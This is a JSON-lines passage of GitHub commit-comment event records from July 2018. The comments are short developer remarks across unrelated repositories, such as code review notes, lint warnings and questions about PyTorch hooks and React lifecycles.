{"id":"8013897527","type":"CommitCommentEvent","actor":{"login":"gregvanl"},"repo":{"name":"Microsoft/vscode-docs"},"payload":{"comment":{"id":29823359,"position":null,"line":null,"path":null,"commit_id":"9207fa64f863cb39b0090102d1f7c3c55f704744","created_at":"2018-07-25T03:07:22Z","updated_at":"2018-07-25T03:07:22Z","author_association":"CONTRIBUTOR","body":"@kraigb Just a heads up - we should use the full relative path for topic links."}},"created_at":"2018-07-25T03:07:22Z"}
{"id":"8013901457","type":"CommitCommentEvent","actor":{"login":"lvpengpeng"},"repo":{"name":"lvpengpeng/react_dzdp"},"payload":{"comment":{"id":29823369,"position":null,"line":null,"path":null,"commit_id":"225beeaafa9fdb6d9c09e165c11a63bdf03307ee","created_at":"2018-07-25T03:08:52Z","updated_at":"2018-07-25T03:08:52Z","author_association":"OWNER","body":" 这里需要理解componentDidMount和componentDidUpdate两个生命周期的不同。\r\n\r\n 页面初次渲染，会走componentDidMount\r\n 页面再次渲染，就不会走componentDidMount，而只走componentDidUpdate"}},"created_at":"2018-07-25T03:08:52Z"}
{"id":"8013901788","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29823371,"position":null,"line":null,"path":null,"commit_id":"c556a0838b795c8aeb0ecd8e9080fd0b0ab81c7d","created_at":"2018-07-25T03:09:01Z","updated_at":"2018-07-25T03:09:01Z","author_association":"NONE","body":"c556a08"}},"created_at":"2018-07-25T03:09:01Z"}
{"id":"8013902027","type":"CommitCommentEvent","actor":{"login":"medofetoh"},"repo":{"name":"medofetoh/Hello-World"},"payload":{"comment":{"id":29823372,"position":null,"line":null,"path":null,"commit_id":"9c0f1b3009ae655bdc262e09a18bb89b74b64334","created_at":"2018-07-25T03:09:07Z","updated_at":"2018-07-25T03:09:07Z","author_association":"OWNER","body":"Hello my class "}},"created_at":"2018-07-25T03:09:07Z"}
{"id":"8013903534","type":"CommitCommentEvent","actor":{"login":"rohitpid"},"repo":{"name":"robotrovsky/Linux-Magic-Trackpad-2-Driver"},"payload":{"comment":{"id":29823376,"position":null,"line":null,"path":null,"commit_id":"ecfde9fce81f189a25da5a3f62db68d8272d37fb","created_at":"2018-07-25T03:09:43Z","updated_at":"2018-07-25T03:09:43Z","author_association":"CONTRIBUTOR","body":"Yup, this is for 4.18 and newer with the goal of mainlining it."}},"created_at":"2018-07-25T03:09:43Z"}
{"id":"8013904809","type":"CommitCommentEvent","actor":{"login":"iAmAdamReid"},"repo":{"name":"LambdaSchool/User-Interface"},"payload":{"comment":{"id":29823384,"position":null,"line":null,"path":null,"commit_id":"16e14aa1eca8fa784f778515a8077faf2dd20113","created_at":"2018-07-25T03:10:13Z","updated_at":"2018-07-25T03:10:13Z","author_association":"NONE","body":"Navbar UI has responsive functionality on Google Chrome; no cross-browser testing has been done yet.\r\n\r\nHover animations were added to the navbar links and the navbar logo.\r\n\r\nNavbar is now sticky on scroll-down, anchoring to the top of the page.\r\n\r\nImplemented proper scaling of banner content."}},"created_at":"2018-07-25T03:10:13Z"}
{"id":"8013904853","type":"CommitCommentEvent","actor":{"login":"jpgzs"},"repo":{"name":"ScrappyZhang/ecommerce_website_development"},"payload":{"comment":{"id":29823385,"position":null,"line":null,"path":null,"commit_id":"9705d873ac515d710b28439ef97028a02f0fd9bc","created_at":"2018-07-25T03:10:14Z","updated_at":"2018-07-25T03:10:14Z","author_association":"NONE","body":"你这是Python 几开发的 是python3.5 以后的版本吗？"}},"created_at":"2018-07-25T03:10:14Z"}
{"id":"8013909241","type":"CommitCommentEvent","actor":{"login":"notestaff"},"repo":{"name":"broadinstitute/viral-ngs"},"payload":{"comment":{"id":29823395,"position":5,"line":114,"path":"tools/snpeff.py","commit_id":"0f959bcad1f2faf3d79751073dc7a35309367c71","created_at":"2018-07-25T03:11:54Z","updated_at":"2018-07-25T03:11:54Z","author_association":"CONTRIBUTOR","body":"i think you have to open os.devnull for writing and pass that handle"}},"created_at":"2018-07-25T03:11:54Z"}
{"id":"8013909691","type":"CommitCommentEvent","actor":{"login":"virginiayung"},"repo":{"name":"virginiayung/scipy_proceedings"},"payload":{"comment":{"id":29823396,"position":41,"line":119,"path":"papers/virginia_ng/Scipy2018_first_draft.rst","commit_id":"2458d2aa294aced1785394660c3ea434b4493fd1","created_at":"2018-07-25T03:12:04Z","updated_at":"2018-07-25T03:12:04Z","author_association":"OWNER","body":"> The class probabilities predict the conditional probability of each class for the proposed object, if it is an object.\r\n\r\nThe class predictions predict the conditional probability of that\r\nclass given that there is an object [cite_0] _."}},"created_at":"2018-07-25T03:12:04Z"}
{"id":"8013912334","type":"CommitCommentEvent","actor":{"login":"Sai2799"},"repo":{"name":"thewood/cis2252_final_project"},"payload":{"comment":{"id":29823404,"position":15,"line":25,"path":"cart.h","commit_id":"45981c8f984575a1d14453903ed0c3f319368583","created_at":"2018-07-25T03:13:03Z","updated_at":"2018-07-25T03:13:03Z","author_association":"NONE","body":"![c_3](https://user-images.githubusercontent.com/41659448/43177621-18e909e8-8f97-11e8-816e-23bfaa57b225.png)\r\n"}},"created_at":"2018-07-25T03:13:03Z"}
{"id":"8013915643","type":"CommitCommentEvent","actor":{"login":"acgtyrant"},"repo":{"name":"pytorch/pytorch"},"payload":{"comment":{"id":29823410,"position":7,"line":32,"path":"torch/nn/parallel/data_parallel.py","commit_id":"805639906a89f22be387546e958d08451882dc13","created_at":"2018-07-25T03:14:15Z","updated_at":"2018-07-25T03:14:15Z","author_association":"CONTRIBUTOR","body":"@SsnL  What code make that \"Forward and backwrad hooks defined on :attr:`module` and its submodules won't be invoked anymore\"?\r\n\r\nBy the way, I do not find any relation between this warning and the current commit."}},"created_at":"2018-07-25T03:14:15Z"}
{"id":"8013917169","type":"CommitCommentEvent","actor":{"login":"alarae"},"repo":{"name":"alarae/alarae.github.io"},"payload":{"comment":{"id":29823411,"position":3,"line":56,"path":"about.html","commit_id":"43e0a5a89c9aeff18475fc7f84fe4ac1b88224ce","created_at":"2018-07-25T03:14:49Z","updated_at":"2018-07-25T03:14:49Z","author_association":"OWNER","body":"Omg"}},"created_at":"2018-07-25T03:14:49Z"}
{"id":"8013927928","type":"CommitCommentEvent","actor":{"login":"eddieajau"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":29823426,"position":null,"line":null,"path":null,"commit_id":"7c981e08e50d2e668b39e5e0b3d730bbea23c892","created_at":"2018-07-25T03:18:50Z","updated_at":"2018-07-25T03:18:50Z","author_association":"NONE","body":"@sdubrez  was it your intention to make `maxFileSize` mandatory?"}},"created_at":"2018-07-25T03:18:50Z"}
{"id":"8013930535","type":"CommitCommentEvent","actor":{"login":"alissaamorgan"},"repo":{"name":"alissaamorgan/GCER_BFA"},"payload":{"comment":{"id":29823428,"position":105,"line":105,"path":"README.md","commit_id":"6f27649ba65007941fe7d559b2fa2aac91eab7b4","created_at":"2018-07-25T03:19:50Z","updated_at":"2018-07-25T03:19:50Z","author_association":"OWNER","body":"CCW?\r\n"}},"created_at":"2018-07-25T03:19:50Z"}
{"id":"8013932526","type":"CommitCommentEvent","actor":{"login":"skudriashev"},"repo":{"name":"uber/doubles"},"payload":{"comment":{"id":29823429,"position":null,"line":null,"path":null,"commit_id":"f9d11f6e676f496f59be6841f2f577137eba7f5b","created_at":"2018-07-25T03:20:32Z","updated_at":"2018-07-25T03:20:32Z","author_association":"CONTRIBUTOR","body":"@sjarvie yes, will be released soon."}},"created_at":"2018-07-25T03:20:32Z"}
{"id":"8013932797","type":"CommitCommentEvent","actor":{"login":"alissaamorgan"},"repo":{"name":"alissaamorgan/GCER_BFA"},"payload":{"comment":{"id":29823430,"position":111,"line":111,"path":"README.md","commit_id":"6f27649ba65007941fe7d559b2fa2aac91eab7b4","created_at":"2018-07-25T03:20:38Z","updated_at":"2018-07-25T03:20:38Z","author_association":"OWNER","body":"CW"}},"created_at":"2018-07-25T03:20:38Z"}
{"id":"8013936802","type":"CommitCommentEvent","actor":{"login":"mengtrue"},"repo":{"name":"javiersantos/MaterialStyledDialogs"},"payload":{"comment":{"id":29823434,"position":null,"line":null,"path":null,"commit_id":"5cc2069ad59269c6c10fef6696a9cb122f13625c","created_at":"2018-07-25T03:22:11Z","updated_at":"2018-07-25T03:22:11Z","author_association":"NONE","body":"after add:\r\n`implementation 'com.afollestad.material-dialogs:core:0.9.6.0'`\r\nit's OK."}},"created_at":"2018-07-25T03:22:11Z"}
{"id":"8013937534","type":"CommitCommentEvent","actor":{"login":"jin-aiit-a1824jj"},"repo":{"name":"a1852rw/shinatora_enpit"},"payload":{"comment":{"id":29823436,"position":null,"line":null,"path":null,"commit_id":"1bc63e4a072c29218c3024823d3609f6c7f3589d","created_at":"2018-07-25T03:22:27Z","updated_at":"2018-07-25T03:22:27Z","author_association":"COLLABORATOR","body":"参考記事\r\n\r\nhttps://ja.stackoverflow.com/questions/9544/travis%E3%81%AE%E3%83%93%E3%83%AB%E3%83%89%E3%81%A7sinatra%E3%81%AEloaderror%E3%81%8C%E7%99%BA%E7%94%9F%E3%81%97%E3%81%A6%E3%81%97%E3%81%BE%E3%81%86\r\n"}},"created_at":"2018-07-25T03:22:27Z"}
{"id":"8013939734","type":"CommitCommentEvent","actor":{"login":"ejlabs"},"repo":{"name":"ejlabs/arduino-nitrox-analyzer"},"payload":{"comment":{"id":29823438,"position":null,"line":null,"path":null,"commit_id":"34a428c2b639a951f8171006b225a83ac0f2f6d1","created_at":"2018-07-25T03:23:18Z","updated_at":"2018-07-25T03:23:18Z","author_association":"OWNER","body":"Wiring diagram"}},"created_at":"2018-07-25T03:23:18Z"}
{"id":"8013956838","type":"CommitCommentEvent","actor":{"login":"rph0862"},"repo":{"name":"rph0862/Testlab2"},"payload":{"comment":{"id":29823468,"position":null,"line":null,"path":null,"commit_id":"9b337510103736021eaea99c4b06503b9b1bbf4f","created_at":"2018-07-25T03:29:47Z","updated_at":"2018-07-25T03:29:47Z","author_association":"OWNER","body":"yy"}},"created_at":"2018-07-25T03:29:47Z"}
{"id":"8013961635","type":"CommitCommentEvent","actor":{"login":"kimbugp"},"repo":{"name":"mendozabree/My-Diary"},"payload":{"comment":{"id":29823475,"position":null,"line":null,"path":null,"commit_id":"c24595d0b1c46c86eb534a63f660660e842a4760","created_at":"2018-07-25T03:31:29Z","updated_at":"2018-07-25T03:31:29Z","author_association":"COLLABORATOR","body":"Good work on the readme"}},"created_at":"2018-07-25T03:31:29Z"}
{"id":"8013963852","type":"CommitCommentEvent","actor":{"login":"tonyyyye"},"repo":{"name":"tonyyyye/fireplace"},"payload":{"comment":{"id":29823478,"position":null,"line":null,"path":null,"commit_id":"13db51d304bb9d3329941e4cb5d63ce380233d36","created_at":"2018-07-25T03:32:20Z","updated_at":"2018-07-25T03:32:20Z","author_association":"OWNER","body":"It still did not pass Travis CI.\r\n\r\n./fireplace/cards/gangs/mage.py:9:41: E231 missing whitespace after ','\r\n./fireplace/cards/gangs/mage.py:9:43: E231 missing whitespace after ','\r\n./fireplace/cards/gangs/mage.py:9:45: E231 missing whitespace after ','\r\n./fireplace/cards/gangs/mage.py:9:47: E231 missing whitespace after ','\r\n./fireplace/cards/gangs/mage.py:9:49: E231 missing whitespace after ','"}},"created_at":"2018-07-25T03:32:20Z"}
{"id":"8013965679","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29823484,"position":1,"line":null,"path":"1532489582.24/github_test.txt","commit_id":"cdcd6b38700916c01eb32813b59e3bf15bd9ea94","created_at":"2018-07-25T03:33:05Z","updated_at":"2018-07-25T03:33:05Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-25T03:33:05Z"}
{"id":"8013967028","type":"CommitCommentEvent","actor":{"login":"freakz1998"},"repo":{"name":"freakz1998/Majestic-project-version-2"},"payload":{"comment":{"id":29823487,"position":5,"line":71,"path":"main.html","commit_id":"06fa7281d71754c30b92ff976dafc65c6b62de99","created_at":"2018-07-25T03:33:36Z","updated_at":"2018-07-25T03:33:36Z","author_association":"OWNER","body":"ha"}},"created_at":"2018-07-25T03:33:36Z"}
{"id":"8013968074","type":"CommitCommentEvent","actor":{"login":"hakunamta00700"},"repo":{"name":"PyWaves/PyWaves"},"payload":{"comment":{"id":29823489,"position":null,"line":null,"path":null,"commit_id":"51dffa12b19406229c687f688a009421fa04e511","created_at":"2018-07-25T03:34:01Z","updated_at":"2018-07-25T03:34:01Z","author_association":"NONE","body":"' MassTransfer ' does not work because you have modified this part."}},"created_at":"2018-07-25T03:34:01Z"}
{"id":"8013968297","type":"CommitCommentEvent","actor":{"login":"jin-aiit-a1824jj"},"repo":{"name":"a1852rw/shinatora_enpit"},"payload":{"comment":{"id":29823490,"position":null,"line":null,"path":null,"commit_id":"9677e41c18b65fdd6b37ce2461fb0ef767ca942a","created_at":"2018-07-25T03:34:06Z","updated_at":"2018-07-25T03:34:06Z","author_association":"COLLABORATOR","body":"参考記事\r\n\r\nhttp://sinatrarb.com/testing.html"}},"created_at":"2018-07-25T03:34:06Z"}
{"id":"8013970080","type":"CommitCommentEvent","actor":{"login":"tonyyyye"},"repo":{"name":"tonyyyye/fireplace"},"payload":{"comment":{"id":29823497,"position":null,"line":null,"path":null,"commit_id":"13db51d304bb9d3329941e4cb5d63ce380233d36","created_at":"2018-07-25T03:34:49Z","updated_at":"2018-07-25T03:34:49Z","author_association":"OWNER","body":"I will fix it this evening and add some cases for that. \r\nBut for ensurance, we'd better add minions together with passed cases before making PR."}},"created_at":"2018-07-25T03:34:49Z"}
{"id":"8013972536","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29823503,"position":31,"line":606,"path":"spec/components/post_destroyer_spec.rb","commit_id":"417bcf7d2e3bf0c31320f71a919a29c6e2150267","created_at":"2018-07-25T03:35:49Z","updated_at":"2018-07-25T03:35:49Z","author_association":"MEMBER","body":"I found out about this recently :P \r\n\r\n`Topic.where(title: I18n.t('system_messages.flags_agreed_and_post_deleted.subject_template')).exists?` \r\n\r\nis the same as \r\n\r\n`Topic.exists?(title: I18n.t('system_messages.flags_agreed_and_post_deleted.subject_template'))`\r\n\r\n5 less characters to type :P"}},"created_at":"2018-07-25T03:35:49Z"}
{"id":"8013973029","type":"CommitCommentEvent","actor":{"login":"biddlecom"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29823505,"position":5,"line":19,"path":"app/src/main/java/com/example/android/quakereport/EarthquakeActivity.java","commit_id":"78e07dce2ab5ed3a7df2b254b853a7cc7ad0b0e8","created_at":"2018-07-25T03:36:00Z","updated_at":"2018-07-25T03:36:00Z","author_association":"NONE","body":"Interestingly enough, I loaded this import statement:  import android.app.LoaderManager.LoaderCallbacks;\r\nand it still remains greyed out even after fixing all the code.  Android Studio says it's an unused import statement.  So maybe we don't need it after all??  Just an observation.  Because in the solution they made sure to tell us to import it (like the app wouldn't function without it, but it does).  *Things that make you go Hmmm*"}},"created_at":"2018-07-25T03:36:00Z"}
{"id":"8013975463","type":"CommitCommentEvent","actor":{"login":"sirnguyen00"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29823509,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T03:36:59Z","updated_at":"2018-07-25T03:36:59Z","author_association":"NONE","body":"nice\r\n"}},"created_at":"2018-07-25T03:36:59Z"}
{"id":"8013977394","type":"CommitCommentEvent","actor":{"login":"tonyyyye"},"repo":{"name":"shinoi2/fireplace"},"payload":{"comment":{"id":29823512,"position":null,"line":null,"path":null,"commit_id":"5f480e4f3a157f01a7a57a7fb8c7aa230087aecb","created_at":"2018-07-25T03:37:43Z","updated_at":"2018-07-25T03:37:43Z","author_association":"NONE","body":"Sorry I missed that. And the additional case job needs to be done."}},"created_at":"2018-07-25T03:37:43Z"}
{"id":"8013983660","type":"CommitCommentEvent","actor":{"login":"qrtz7950"},"repo":{"name":"qrtz7950/bit"},"payload":{"comment":{"id":29823515,"position":null,"line":null,"path":null,"commit_id":"dec6a775b48db4ae0c80c389e2349fa9eddc6e91","created_at":"2018-07-25T03:40:18Z","updated_at":"2018-07-25T03:40:18Z","author_association":"OWNER","body":"잘못지웟다"}},"created_at":"2018-07-25T03:40:18Z"}
{"id":"8013984655","type":"CommitCommentEvent","actor":{"login":"andrewcole"},"repo":{"name":"illallangi/suwa-sunk"},"payload":{"comment":{"id":29823517,"position":null,"line":null,"path":null,"commit_id":"3545e5b99635e8e0709ab693f411493ea66f146b","created_at":"2018-07-25T03:40:43Z","updated_at":"2018-07-25T03:40:43Z","author_association":"MEMBER","body":"https://docs.microsoft.com/en-us/azure/aks/static-ip"}},"created_at":"2018-07-25T03:40:43Z"}
{"id":"8013989357","type":"CommitCommentEvent","actor":{"login":"justcla"},"repo":{"name":"justcla/HotTips"},"payload":{"comment":{"id":29823526,"position":3,"line":1,"path":"HotTips/Tips/EDI_IfElseRefactor.md","commit_id":"8fd03697cc4b88c5da63cfea8ddb8cb1bd00d754","created_at":"2018-07-25T03:42:33Z","updated_at":"2018-07-25T03:42:33Z","author_association":"OWNER","body":"I totally made up those words. I have no idea what the text on the lightbulb will say. :-D"}},"created_at":"2018-07-25T03:42:33Z"}
{"id":"8013990938","type":"CommitCommentEvent","actor":{"login":"shawnchain"},"repo":{"name":"rssnsj/minivtun"},"payload":{"comment":{"id":29823533,"position":361,"line":323,"path":"src/client.c","commit_id":"8add412a8a5baaf7b50937a38e560d04861009eb","created_at":"2018-07-25T03:43:09Z","updated_at":"2018-07-25T03:43:09Z","author_association":"CONTRIBUTOR","body":"A kind remind, on my cheap MT7620 box, NTP will rewind the time back several ms every few hours, gettimeofday() may not safe here to calculate the time elapsed in a very few gaps (like every 5 ~ 10 ms)."}},"created_at":"2018-07-25T03:43:09Z"}
{"id":"8013991851","type":"CommitCommentEvent","actor":{"login":"justcla"},"repo":{"name":"justcla/HotTips"},"payload":{"comment":{"id":29823534,"position":2,"line":1,"path":"HotTips/Tips/EDI_UnreachableCode.md","commit_id":"8fd03697cc4b88c5da63cfea8ddb8cb1bd00d754","created_at":"2018-07-25T03:43:28Z","updated_at":"2018-07-25T03:43:28Z","author_association":"OWNER","body":"I made up these words too. :-)"}},"created_at":"2018-07-25T03:43:28Z"}
{"id":"8013992964","type":"CommitCommentEvent","actor":{"login":"ransom1538"},"repo":{"name":"tobozo/M5Stack-SD-Updater"},"payload":{"comment":{"id":29823538,"position":null,"line":null,"path":null,"commit_id":"df666a0d785ee9ed7292774f13fb3ed45c2b8501","created_at":"2018-07-25T03:43:56Z","updated_at":"2018-07-25T03:43:56Z","author_association":"NONE","body":"Dude. You bashed me on reddit now I see you are loaded with stars.  No good deed goes unpunished.  You really tore me down. "}},"created_at":"2018-07-25T03:43:56Z"}
{"id":"8013993436","type":"CommitCommentEvent","actor":{"login":"justcla"},"repo":{"name":"justcla/HotTips"},"payload":{"comment":{"id":29823539,"position":null,"line":null,"path":null,"commit_id":"8fd03697cc4b88c5da63cfea8ddb8cb1bd00d754","created_at":"2018-07-25T03:44:09Z","updated_at":"2018-07-25T03:44:09Z","author_association":"OWNER","body":"Thanks man. Great changes. !!\r\n\r\nJust not sure what the text it for a couple of lightbulb items.\r\n"}},"created_at":"2018-07-25T03:44:09Z"}
{"id":"8013996346","type":"CommitCommentEvent","actor":{"login":"ransom1538"},"repo":{"name":"tobozo/M5Stack-SD-Updater"},"payload":{"comment":{"id":29823542,"position":null,"line":null,"path":null,"commit_id":"df666a0d785ee9ed7292774f13fb3ed45c2b8501","created_at":"2018-07-25T03:45:17Z","updated_at":"2018-07-25T03:45:17Z","author_association":"NONE","body":"Oh I am sure you went around tearing down your stars.  Thanks man for helping out a guy with a new project ;) "}},"created_at":"2018-07-25T03:45:17Z"}
{"id":"8013997192","type":"CommitCommentEvent","actor":{"login":"acgtyrant"},"repo":{"name":"pytorch/pytorch"},"payload":{"comment":{"id":29823545,"position":7,"line":32,"path":"torch/nn/parallel/data_parallel.py","commit_id":"805639906a89f22be387546e958d08451882dc13","created_at":"2018-07-25T03:45:38Z","updated_at":"2018-07-25T03:45:38Z","author_association":"CONTRIBUTOR","body":"@SsnL  Does \"Forward and backwrad hooks defined on :attr:module and its submodules won't be invoked anymore\" means the any hook registered in module via `register_forward_hook`, `register_forward_pre_hook` and `regitster_backward_hook` will not be executed while the module is wrapped by `torch.nn.parallel.DataParallel`?\r\n\r\nI test in my project and find it that the registered hook still works in the DataParallel model."}},"created_at":"2018-07-25T03:45:38Z"}
{"id":"8014001262","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/NetLogoR"},"payload":{"comment":{"id":29823552,"position":null,"line":null,"path":null,"commit_id":"bc3a18ff2853838085c6bc1b287c04e74b0f1437","created_at":"2018-07-25T03:47:16Z","updated_at":"2018-07-25T03:47:16Z","author_association":"NONE","body":"[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:64:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L64) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.WolfSheepPredation <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:113:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L113) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationInit <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:185:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L185) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationSave <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:200:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L200) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationPosition <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:220:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L220) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationPopSize <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:243:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L243) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationEvent <- function(sim){\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:15:12:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L15) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  function(.Object=\"agentMatrix\", coords, ..., levelsAM) {\n           ^~~~~~~\n```\n[R/agentMatrix-Class-methods.R:16:5:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L16) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    Coords <- TRUE\n    ^~~~~~\n```\n[R/agentMatrix-Class-methods.R:29:7:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L29) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      Coords <- FALSE\n      ^~~~~~\n```\n[R/agentMatrix-Class-methods.R:395:6:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L395) *style:* **Commented code should be removed.**\n```r\n​    #charCols <- match(j, nam)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:396:6:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L396) *style:* **Commented code should be removed.**\n```r\n​    #charCols <- match(nam, j)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:397:34:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L397) *style:* **Commented code should be removed.**\n```r\n​    numCols <- which(!charCols) #colNums[!(colNums %in% charCols)]\n                                 ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:404:8:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L404) *style:* **Commented code should be removed.**\n```r\n​      #numColsJ <- which(colNums %in% numCols)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:409:8:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L409) *style:* **Commented code should be removed.**\n```r\n​      #charColsJ <- which(colNums %in% charCols)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:609:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L609) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​head.agentMatrix <- function(x, n = 6L, ...) {\n^~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:617:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L617) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​tail.agentMatrix <- function(x, n = 6L, ...) {\n^~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:638:36:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L638) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​cbind.agentMatrix <- function(..., deparse.level) {\n                                   ^~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:662:36:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L662) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​rbind.agentMatrix <- function(..., deparse.level = 1) {\n                                   ^~~~~~~~~~~~~\n```\n[R/agentset-functions.R:1537:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentset-functions.R#L1537) *style:* **Lines should not be more than 100 characters.**\n```r\n​        pOverL <- over(pBuffer, SpatialPoints(coords = agents2cAll, proj4string = .projNowhere), returnList = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentset-functions.R:1549:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentset-functions.R#L1549) *style:* **Lines should not be more than 100 characters.**\n```r\n​                       SpatialPoints(coords = agents2@.Data[, c(\"xcor\", \"ycor\"), drop = FALSE], proj4string = .projNowhere),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/patch-functions.R:609:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/patch-functions.R#L609) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @seealso \\url{https://ccl.northwestern.edu/netlogo/docs/dictionary.html#patch-at-heading-and-distance}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plot.R:37:3:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/plot.R#L37) *style:* 